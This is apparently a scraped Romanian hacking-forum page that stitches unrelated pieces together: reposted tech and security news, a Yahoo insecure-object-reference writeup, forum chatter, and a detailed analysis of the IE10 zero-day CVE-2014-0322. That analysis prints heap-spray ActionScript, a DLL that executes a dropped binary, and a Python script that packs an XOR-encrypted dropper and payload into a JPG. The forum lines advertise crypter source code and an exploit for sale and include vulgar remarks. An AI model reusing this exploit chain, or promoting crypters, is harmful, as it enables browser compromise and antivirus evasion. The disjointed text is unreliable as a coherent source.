Byte-ul

In four years David Varvel went from no health insurance, to full coverage via the Japanese government, to purchasing a high deductible plan, and then full coverage through an employer. He said having to switch insurance that often was “painful.” But now the founder of Tiny Cat Loans, a community lending platform, said he and his family have settled on HackerCare: a healthcare startup for startups that is working to hack healthcare. HackerCare launched in beta in early February, and counts about a dozen members. The company signs up members for a health plan with the help of an insurance broker, and for an additional $50 a year, provides other services from health startups to supplement insurance with the aim of lowering costs. “HackerCare is for entrepreneurs, by entrepreneurs. Also, it’s a lot easier to communicate with a smaller more agile company like HackerCare than a massive hulk like Kaiser or Blue Cross,” Varvel told TechCrunch. “It’s a great way for me to get coverage while getting my startup off the ground.” Based in Sacramento, HackerCare is focusing on signing up people in Silicon Valley — although later this year the plan is to expand coast-to-coast, said CEO Gina Lujan. The bootstrapped company is partnering with health startups to offer additional services for members, allowing them to launch in beta with a real customer pool, and giving HackerCare members services that save them money. “We want to hack that health plan with additional services,” Lujan said. Thus far, 1.6 million Californians have either signed up for a plan or enrolled in state Medi-Cal through Covered California; of those, 728,410 signed up for their own plans. Covered California, the state’s insurance exchange, allows users to search for plans, depending on their ZIP code and income. There are plans available for less than $200, as well as others that are double or triple that price. Spokeswoman Sarah Sol told TechCrunch that Covered California is the best place to get information about receiving federal assistance, counseling or any official insurance information. Some of the services HackerCare is set to provide members includes TelaDoc, allowing members to skip on a deductible to see a doctor and Skype with one, and vision services with The Shop @ VSP Global. In the future Lujan said child services, help with medical bills, wellness, and pharmacy benefits may also be included. These services come from medtech startups, which can float new products to HackerCare members in beta in order to innovate more quickly, she said. “HackerCare members may prove to be the perfect test bed to try and fail fast with some new services and delivery methods that VSP is developing through our innovation lab, The Shop,” said Jay Sales, innovation strategist at VSP Global, a HackerCare sponsor. “By working with them, hopefully we can come up with some interesting experiences that can transfer to all our members.” Sales noted that a large wave of health innovation is happening in the startup world now, and HackerCare is poised to help those startups take their work to the next level. In the coming months Lujan said HackerCare plans to create a deductible pool that will allow members to receive up to 80 percent deductible coverage in the case of a catastrophic event. Even further down the line, in a few years, Lujan said the plan is that HackerCare has several thousand members and can write its own insurance plan that better caters to members both health-wise, and cost-wise. For a budding entrepreneur like Varvel, being on the cutting edge of health technology is a great way to keep his family healthy. He said he is now less worried about the future of his healthcare, and can focus more on the future of his startup — something he said will help HackerCare become a big hit. “If HackerCare can make healthcare 10 percent less painful for entrepreneurs, they’ll do great,” Varvel said. Sursa: HackerCare Aims To “Hack” Healthcare For Startups | TechCrunch

AmEx has offered a number of different cards to consumers: The Blue Card appeals to those who like cash back options and the Platinum card is specialized for consumers who travel. There’s even a Black Card for high-net-worth individuals. Today, the company is debuting a brand-new rewards-focused credit card, called Everyday, aimed at consumers who use AmEx for most of their everyday purchases. While the AmEx Everyday card is broadly focused on the frequent spender, and “multi-tasker,” the core audience is the busy mom. As AmEx US Consumer Services President (and former Skype CEO) Josh Silverman explains, the typical Everyday card user uses credit and or debit cards at least twice a day. AmEx says that moms spend 18 percent more on monthly expenses compared to the general population (which, as a mom, I believe). The card itself doesn’t have a yearly fee, and it allows for a revolving balance. Users will get double reward points at supermarkets, and if an Everyday card member uses the card for 20 purchases or more in a given month, AmEx will boost the consumer’s bonus points by 20 percent. What’s interesting from a technology standpoint is the core integration with AmEx’s mobile app. When you open the app and integrate your card details, the app will recognize that you are an Everyday member and will show you where you are in the month toward 20 purchases. Users will also get notifications when they can apply rewards points to their purchases, a feature that is being rolled out more widely with this card. You’ll be able to use the points right away, redeem via your mobile phone, and the deduction will be implemented on your AmEx bill. As Silverman explains, this integration with the mobile app “begins a more regular dialogue between AmEx and card members, and it brings benefits to life more in context.” The card will be available for consumers to apply by April 2, 2014, and will also contain an EMV chip. It’s not surprising that AmEx is appealing to the busy mom who controls a lot of discretionary spending in the household. But what’s distinctive about this launch is the integrations with the mobile app — it’s not surprising that AmEx wants to engage with consumers on mobile beyond just using the apps to check balances or pay bills. The challenge is creating engaging features for consumers to want to open the apps more frequently. Rewards is one hook that AmEx has been particularly focused on, so it will be interesting to see how the multi-tasker consumer responds to this offering. Sursa: AmEx Debuts Its Most Mobile-Integrated, Rewards-Focused Credit Card | TechCrunch

Romania a adus in tara pentru ingrijiri romanii din ucraina. Nu le-a facut nimic ucrainienilor

Yahoo! The 4th most visited website on the Internet has been found vulnerable multiple times, and this time a hacker has claimed to spot a critical vulnerability in the Yahoo! sub-domain 'suggestions.yahoo.com', which could allow an attacker to delete the all the posted thread and comments on Yahoo's Suggestion Board website. Egyptian Cyber Security Analyst, 'Ibrahim Raafat', found and demonstrated 'Insecure Direct Object Reference Vulnerability' in Yahoo's website on his blog. Exploiting the flaw escalates the user privileges that allow a hacker to delete more than 365,000 posts and 1,155,000 comments from Yahoo! Database. Technical details of the vulnerability are as explained below: Deleting Comments: While deleting his own comment, Ibrahim noticed the HTTP Header of POST request, i.e. Where parameter 'fid' is the topic id and 'cid' is the respective comment ID. While testing, he found changing the fid and cid parameter values allow him to delete other comments from the forum, that are actually posted by another user. Deleting Posts: Next, he also tested post deletion mechanism and found a similar loophole in that. A normal HTTP Header POST request of deleting a post is: He found that, appending the fid (topic id) variable to the URL allows him to delete the respective post, that was not posted by himself i.e. POST cmd=delete_item&crumb=SbWqLz.LDP0&fid=xxxxxxxx Ibrahim has reported the flaw to Yahoo Security team and also provided a Video Demonstration, as shown below: A potential attacker with little knowledge of programming could write an automated script to delete all the comments and posts using 'for loop' or 'while loop'. The vulnerability hunter claimed that he had received the Bug Bounty for reporting this security flaw to yahoo and which now has been fixed by the company.

Few days ago the news about a fresh Internet Explorer 10 zero-day exploit popped up. Now the exploit code is publicly available and we managed to analyze the vulnerability and find out some details that were not mentioned so far. At the time of writing this blog, this exploit is still unpatched. We tested the exploit on Windows 7 SP1 Enterprise 32 bit with several versions of Flash Player (10, 11 and 12). The code provided in the article was derived from the actual exploit but we simplified it and gave some meaningful names to the variables. General diagram of the attack looks like this: First, let’s see the vulnerability itself. To do that we need to get rid of the flash part and call the vulnerable function explicitly: We set up a simple python web server (python.exe –m SimpleHTTPServer 8080) and ran IE10 in WinDbg by issuing this command: Soon after the page loads, the exception occurs somewhere at MSHTML.DLL offset 281b97: EAX here points at the heap address 0x1a1b2000, the one provided in the exploit code as (0x1a1b2000 – 0×10). Apparently whoever found this vulnerability had figured that it is suited for a Flash based ASLR bypass. We noticed that in 6-7 cases out of 10, Internet Explorer would crash before reaching the vulnerable condition. It may work better on other versions of Windows, but in our set up it is not very reliable. The exploitation method is well described here and here. The exploit leverages the way Action Script 3 Vector class instance is allocated in the memory. The heap spray instances are aligned at 0×1000 boundaries so that when a big enough spray is provided, one of the allocations will end up at 0x1a1b2000 with high probability. This approach is not reliable, because in the presence of better randomization, the heap may not align. This piece of the Action Script 3 code: this.s = new Vector.<Object>(98688); for (i=0; i < 98688; i++) { this.s[i] = new Vector.<uint>(1022); this.s[i][0] = 0xDEADBEE1; this.s[i][2] = 0x1a1b2000; this.s[i][3] = 0x1a1b2000; this.s[i][110] = 0; this.s[i][186] = 0x41414141; } produces the following memory layout repeating every 0×1000 bytes: The way Vector objects are handled is a bit different in the versions of the player prior to 11, so the exploit will not work on Flash 10. The IE portion of the exploit can increment the doubleword 0x000003FE, which corresponds to the size of the vector. According to the AS3 documentation a Vector is a dense array, and accesses to its instances are boundary checked. So incrementing the size will allow an attacker to modify one doubleword beyond the vector boundaries. This doubleword is the size of the next vector. Now the attacker can assign it some big number and access the whole process memory. This creates a R/W exploit primitive, which should allow for a more reliable exploit to be created. But how does the attacker know which vector was affected by the vulnerability? Or in other words, which element is at 0x1a1b2000? To find this out, the attacker’s AS3 code simply iterates through the parent vector (referenced as this.s in the code above) and stops when the current vector length is bigger than 0x03FE. Let’s examine how this search procedure looks: // Looking for affected vector for (i = 0; i < 0x18180; ++i){ if (this.s[i].length > 1022) break; } // This element is now writable since // the length of the vector is 1023 this.s[i][1022] = 0x3FFFFFF0; Now the next vector element can access 0x3FFFFFF0 bytes of memory starting from its first element. This enables the exploit to iterate through memory and find the necessary ROP gadgets.To start the exploit, the toString() method of the Sound class is overwritten. The actual malicious payload is stored in the JPG image that flash downloads and stores as a byte array (which is an array of binary data in AS3). We don’t have the image so we had to reverse the image format via shellcode analysis. It has the following structure: 36321 bytes of data (possibly legitimate image bytes); 4 bytes size of two payloads (it’s there for decryption purposes); 4 bytes size of the dropper (supposedly a DLL); 4 bytes size of the malware binary; Dropper XOR-encrypted with key 0×95 Malware binary XOR-encrypted with key 0×95 First the shellcode decrypts the payloads and then writes both to files (that’s why the sizes of each payload were provided). The target path is obtained via GetTempPath function. Dropper is named sqlrenew.txt and malware binary stream.exe. After writing data on disk it calls LoadLibrary and passes sqlrenew.txt as an argument. In order to reproduce the attack we prepared a simple DLL that would execute stream.exe: #include #include #include #define BUFFLEN 256 #define NAME "\stream.exe" BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { char buf[BUFFLEN]; int len; if (fdwReason == DLL_PROCESS_ATTACH){ len = GetTempPath(BUFFLEN, buf); strncpy(&buf[len], NAME, strlen(NAME)); WinExec(buf, SW_SHOWNORMAL); } return TRUE; }; To test successful exploitation, we took calc.exe as our neutralized payload. Now, we pack everything into the image and we wrote a python script: import struct KEY = 0x95 OFFSET = 36321 DLL = 'dll.dll' MALWARE = 'calc.exe' def read_file(path): fd = open(path, 'rb') data = fd.read() fd.close() return data def encrypt(data): encr_data = [] for byte_ in data: if ord(byte_) == 0 or ord(byte_) == KEY: out_byte = byte_ else: out_byte = chr(ord(byte_)^KEY) encr_data.append(out_byte) return ''.join(encr_data) outfd = open('Erido.jpg', 'wb') outfd.write('A'*OFFSET) dll = read_file(DLL) mw = read_file(MALWARE) dll_len = len(dll) mw_len = len(mw) total_len_packed = struct.pack('<I', dll_len+mw_len) dll_len_packed = struct.pack('<I', dll_len) mw_len_packed = struct.pack('<I', mw_len) outfd.write ( total_len_packed ) outfd.write ( dll_len_packed ) outfd.write ( mw_len_packed ) outfd.write( encrypt(dll) ) outfd.write( encrypt(mw) ) outfd.close() Thus the exploit first loads a DLL which calls calc.exe: Naturally we managed to test this exploit in vSentry. The attack was successfully detected and isolated. All users using the vSentry product are obviously protected from this attack (and future unseen attacks). Below is the brief LAVA trace which we saw after reproducing the exploit successfully. Interestingly, we had to do some work to make this exploit work. It would crash before reaching the vulnerability condition, producing an error like this: We could only make it work after increasing the first allocation by IE from 0×250 to 0×260 in this snippet (arrLen is the variable whose value we changed): for (a = 0; a < arrLen; ++a) { g_arr[a] = document.createElement('div') }; Furthermore, this exploit would also crash in the middle of Flash DLL in the Player v. 11 despite the correct and seemingly exploitable memory layout. These little issues further prove the point that either the exploit writers didn’t spend enough time perfecting the exploit or perhaps they were in a hurry to get it deployed? But then again, bad guys don’t need to infect all users, just few are enough to make reasonable profits. We expect that there is a considerable risk of a more advanced version of this exploit coming up in the wild. One of Bromium Labs researchers, Jared DeMott, recently discussed how to bypass EMET, which is currently listed as one of the recommended tools to mitigate this zero day exploit. Source: Dissecting the newest IE10 0-day exploit (CVE-2014-0322) | Bromium Labs

Once again, a new revelation showed the ugly side of the Government who are conducting Global Mass surveillance and previous documents leaked by the whistleblower Edward Snowden have defaced the US Intelligence Agency NSA, who were taking care of a number of projects like PRISM, XKeyscore, DROPOUTJEEP, and various others to carry out surveillance of millions of people. Now, it has been revealed that the US National Security Agency (NSA) helped its British counterpart, the Government Communications Headquarters (GCHQ), to allegedly capture and store nude images and others from webcam chats of millions of unsuspecting Yahoo users, The Guardian reported. Documents handed to the Guardian by the former NSA contractor Edward Snowden show that the GCHQ's worked with the US intelligence agency NSA on a joint project dubbed as ‘Optic Nerve’. The project carried out a bulk surveillance program, under which they nabbed webcam images every five minutes from random Yahoo users' video chats and stored them in a database. The project didn’t target individual users; rather it targeted Yahoo webcam chats between 2008 and 2010. Indeed, the method of collection appears somewhat recklessly, and in just six months of period alone, the still images of about 1.8 million users were captured and stored in the government servers in 2008. Instead of saving full videos, the program logged one image every five minutes from a user's chat. The document says that between 3 and 11 percent of the images taken contain "undesirable nudity." One GCHQ document states, "It would appear that a surprising number of people use webcam conversations to show intimate parts of their body to the other person." The collected webcam information was stored in the NSA's XKeyscore search tool, and the NSA research was used to build the tool which identified Yahoo's webcam traffic, reads the report. GCHQ webcam spying program, Optic Nerve, was still active in 2012, according to an internal GCHQ wiki page accessed that year. Why Images??? It is known from the revealed documents that the images were collected by the government agency, so that the group could experiment with facial recognition. "Face detection has the potential to aid selection of useful images for 'mugshots' or even for face recognition by assessing the angle of the face," it reads. "The best images are ones where the person is facing the camera with their face upright." The GCHQ agency staffs were allowed to display "webcam images associated with similar Yahoo identifiers to your known target", the document reads, also it states “Bulk surveillance of Yahoo users was begun” as "Yahoo webcam is known to be used by GCHQ targets." Not Surprising, because your knotty private webcam sex session you loved and enjoyed with your lover four years back was potentially pored over by the suits at GCHQ. Yahoo has reacted furiously and denied any prior knowledge of the webcam interception program, and said that it had no awareness of or involvement with the GCHQ collection, describing the activity as "a whole new level of violation of our users' privacy." And a GCHQ spokesman said in a statement, "It is a longstanding policy that we do not comment on intelligence matters. Furthermore, all of GCHQ's work is carried out in accordance with a strict legal and policy framework which ensures that our activities are authorized, necessary and proportionate, and that there is rigorous oversight, including from the secretary of state, the interception and intelligence service commissioners and the Parliamentary Intelligence and Security Committee,” adding, “All our operational processes rigorously support this position." The NSA spokesperson declined to respond saying, "As we've said before, the National Security Agency does not ask its foreign partners to undertake any intelligence activity that the US government would be legally prohibited from undertaking it." This is how our privacy is getting ruined by the government intelligence officials that we all trust blindly. Source: 'Optic Nerve' - Dirty NSA hacked into Webcam of millions of Yahoo users for Private Images - The Hacker News //nu am vazut ca a mai fost postat, stergeti va rog.

Do you know, A Computer viruses could go Airborne over WiFi networks? Security researchers at the University of Liverpool in Britain have demonstrated a WiFi virus that can spread between computer networks just like the 'common cold' spreads between Humans. They have created a proof-of-concept which can infect the entire wireless network instead of a single computer at a time, that replaces the firmware of the vulnerable Access Point (AP) with a virus-loaded version, and then propagates itself to the next victim on the WiFi network. The WiFi based virus named as 'Chameleon', that can self-propagate over WiFi networks from access point to access point, but doesn't affect the working of the Wireless Access Point. This Virus is able to identify WiFi access points that are not protected by encryption and passwords, according to the research paper. It can badly hit less-protected open access WiFi networks available in coffee shops or airports. It propagates in the following sequence: It Establish a list of susceptible APs within the range Bypass any encryption Security on the targeted AP Bypass the administrative interface on the targeted AP Identify and Store AP System Settings Replace the AP firmware on with the virus-loaded firmware. Import the victim original AP System Settings on newly loaded firmware Let's Propagate! Back to Step one to next Target. The experimental simulated demonstration was performed in two cities i.e. Belfast, NI and London, England. A random access point was made infected with the virus which act as a seed, the results were published in the paper. The Chameleon attack is a serious threat for WiFi network security. The research shows that this kind of attack is undetectable to any Antivirus and Wireless Intrusion Detection System (IDS). The Density of Access points in a certain geographical area increases the security issues for wireless networks, because it spreads very quickly at high speed in an area having denser Access Point availability. However, the virus itself doesn’t exist in the wild and created for the demo purpose in the research lab only, though it is very likely that a malicious version could be created and released into the wild by cyber criminals and malware writers. Source: Chameleon Virus that Spreads Across WiFi Access Points like Common Cold - The Hacker News

Looking for a*Secure Smartphone? World's biggest Aerospace company - Boeing is finally close to the launch of its high-security Android Smartphone, called "Boeing Black (H8V-BLK1)",*primarily designed for secure communication between Governmental agencies and their contractors. Encrypted email, Secure Instant Messaging and Other privacy services and tools are booming in the wake of the National Security Agency’s recently revealed surveillance programs. Encryption isn’t meant to keep hackers out, but when it’s designed and implemented correctly, it alters the way messages look. Boeing is the company which is already providing secure communications for US Government officials, including the president. Don't mess with it, It can**Self-Destruct:*Boeing Black*Smartphone can Self-Destruct*if it is tampered with, destroying all the data on it. The device is delivered in complete sealed form, any attempt to open the seal of the device will destruct the operating system and functionality of the device. “Any attempt to break open the casing of the device would trigger functions that would delete the data and software contained within the device and make the device inoperable,” says the paperwork. Well, another important fact to be noticed,*Boeing Black (H8V-BLK1) won't be available to average consumers, it is designed for Governmental agencies, Defense and Homeland security only. Ultra-Secure Mobile Operating System:*Boeing's modified Android operating system has a specific software security policy configuration, so users can configure the device for maximum mission productivity and security. "Boeing Black’s security is powered by the Boeing PureSecure architecture, which was designed from the outset for the mobile environment. Our architectural foundation is built upon layers of trust from embedded hardware, operating system policy controls, and compatibility with leading mobile device management systems. The device’s hardware roots of trust and trusted boot ensure the device starts in a trusted state, enabling the maximum security of data. Hardware media encryption and configurable inhibit controls are embedded to protect the device, its data, and the transmission of information, significantly reducing the risk of mission compromise due to data loss." according to the paperwork they filed with the Federal Communication Commission (FCC). Boeing Black supports*dual MicroSIM with GSM, WCDMA, and LTE on a wide range of*bands to facilitate global*use and operates on the modified version of Android Operating, that keeps all details as secure as possible. Security and Confidentiality of the information of any person related to the National Security must be on the high priority, but problem arises when the NSA like agencies starts capturing the Data flowing on the backbone of the communication channel and Bribes Software companies to weaken the encryption, and that compels a user to think twice before opting the new inventions and products. At the Mobile World Congress in Barcelona,*Washington-based software firm Silent Circle and Madrid-based Geeksphone teamed up to launch the Blackphone, highly secure device that doesn't run on any traditional telecom carriers or operating systems. We have reported earlier, there is another interesting*Self-destructing Chips project, that has been handed over to IBM by the Defense*Advance Research Projects Agency (DARPA). Sursa: Boeing launches Ultra-Secure 'Black' Smartphone that has Self-Destruct Feature - The Hacker News

Hmmm http://pornhub.com

Daca firma nu este din Romania, nu ar trebui sa iti aduca produsul la adresa firmei? (care nu este in Romania)

Join Date Mar 2011 Uita-te ce ii apare lui la profil... asta cred ca e

"Vand Urmatoarele: Exploit PMA 2013/14(120 euro+setup)" Nu esti in stare sa decriptezi o parola. lol

Ce treaba are rootatul cu aplicatiile instalate pe telefon? )))

Cand am vazut threadul lu' asta nu am putut sa ma abtin sa nu rad ))))))))))) deci e penal omu ))))) Cel mai aiurea este ca si el crede ce zice si face )))))))))

PM si mie.

Scrie in titlu, VAND SURSA, NU BIN-UL LA CRYPTER. Cititi inainte sa sariti cu chestii de genul.

Am gasit si un video cu crypterul in PC... Daca sunteti interesati: http://www.youtube.com/watch?v=is7Z1NguA4E E vechi de o luna, insa totul a ramas lafel.

Sa inteleg ca ambele site-uri sunt ale tale? Nationalisti.RO | Social – Radical – National Lupul Dacic | BLOG PENTRU REGASIREA INDENTITATII NATIONALE

Nu merge. Asta e cloudflare, nu e in stare sa afle IP-ul. CrackZone

omg chestia cu suge-o ramona e epica. (am ajuns la capitolul 2!

O sa iti dea ala si programul cu care vei folosi interfata. Elm-ul e doar pentru diagnoza, nu poti face modificari. Si daca ai descarcat aplicatia de la aia, o sa iti trebuiasca interfata originala care costa foarte foarte mult. Uite versiunea 12: http://www.okazii.ro/diagnoza-auto/testere-diagnoza/vag-com-vcds-12-12-0-12-12-full-activat-interfata-diagnoza-volkswagen-audi-skoda-seat-interpretarea-codurilor-de-eroare-garantie-6-luni-a141500573

VAG COM VCDS 11.11.3 Versiune 2013 Interfata Diagnoza Volkswagen , Audi,Skoda , Seat , interpretarea codurilor de eroare- GARANTIE 6 LUNI - Okazii (143433426)

Sursa este inca de vanzare!!

ce te fute grija cat timp e postat in categoria corecta?

ala foloseste google ca sa caute, duh. Poti selecta sa foloseasca yahoo, bing, etc.